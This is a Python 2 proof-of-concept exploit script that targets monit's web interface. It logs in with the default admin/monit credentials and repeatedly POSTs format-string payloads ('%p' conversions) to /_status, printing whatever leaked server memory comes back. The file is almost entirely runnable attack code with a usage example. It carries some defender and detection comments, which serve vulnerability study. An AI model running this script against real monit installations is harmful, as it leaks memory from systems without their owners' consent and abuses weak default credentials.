#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import requests
import argparse
import base64
import socket
import random
from time import sleep
# Command-line interface. The positional `url` is the base URL of the monit
# HTTP interface (the example in the description uses 2812, monit's default
# port). `-username` / `-password` default to admin / monit, the well-known
# monit defaults. Every option uses nargs=1, so values are read as args.x[0].
parser = argparse.ArgumentParser(description='Example: ./monit_buffer_overread.py http://127.0.0.1:2812 -username admin -password monit')
parser.add_argument('url', type=str, nargs=1,
    help='url to target')
parser.add_argument('-username', type=str, nargs=1, default=['admin'],
    help='monit username, defaults to admin')
parser.add_argument('-password', type=str, nargs=1, default=['monit'],
    help='monit password, defaults to monit')
args = parser.parse_args()
# HTTP Basic credentials. Python 2 only (the shebang selects python2):
# b64encode takes and returns str here; on Python 3 this raises TypeError.
auth_header = 'Basic ' + base64.b64encode(args.username[0] + ':' + args.password[0])
# Both the cookie and the `securitytoken` form field built in generateData()
# carry the same fixed value 'a'; no real token is obtained from the server.
# Defender note: the HTTP interface running with default credentials is what
# makes this script usable as written; restricting access to it and keeping
# monit current are the mitigations.
headers = {'Authorization': auth_header, 'Cookie': 'securitytoken=a'}
def generateData():
    """Build the form-encoded POST body for one probe request.

    Returns ``action=exec&service=aaa %p ... %p&securitytoken=a`` with a
    random count (1..60 inclusive) of ' %p' conversions appended to the
    marker 'aaa'. The marker is what the main loop splits the response on.
    Detection note: a `service=` value carrying repeated '%p' in a POST to
    /_status is not something a legitimate monit client sends.
    """
    number = random.randint(1,60)
    # marker followed by `number` printf-style pointer conversions
    payload = "aaa" + " %p" * number
    data = ('action=exec&service=' + payload + '&securitytoken=a')
    return data
print("[x] POC will loop forever. Press CTRL-C to exit")
sleep(2)
# Request loop: one POST to <url>/_status every 0.15 s until CTRL-C
# (KeyboardInterrupt is not caught) or a requests-level error. Each response
# body is expected to contain the 'aaa' marker, then whatever the server
# rendered for the %p conversions, then the text 'not found'; the slice
# between those two strings is printed. If 'aaa' does not occur in the body
# (e.g. an authentication failure), split() yields one element and the [1]
# index raises IndexError, ending the script with a traceback.
# Defender note: the observable pattern is a steady stream of POSTs to
# /_status whose body carries `service=aaa %p %p ...`, sent with HTTP Basic
# credentials and a constant `securitytoken=a` cookie and field.
while True:
    try:
        sleep(0.15)
        print("[*] Sending request")
        r = requests.post(args.url[0] + '/_status', headers=headers,data=generateData())
        # r.content is str under Python 2, so str.split applies directly;
        # under Python 3 it is bytes and this line would raise TypeError.
        print("[*] Response contains: "+ r.content.split("aaa")[1].split("not found")[0])
    except requests.exceptions.RequestException as e:
        # Python 2 print statement; `exit` is the site-module builtin.
        print e
        exit(1)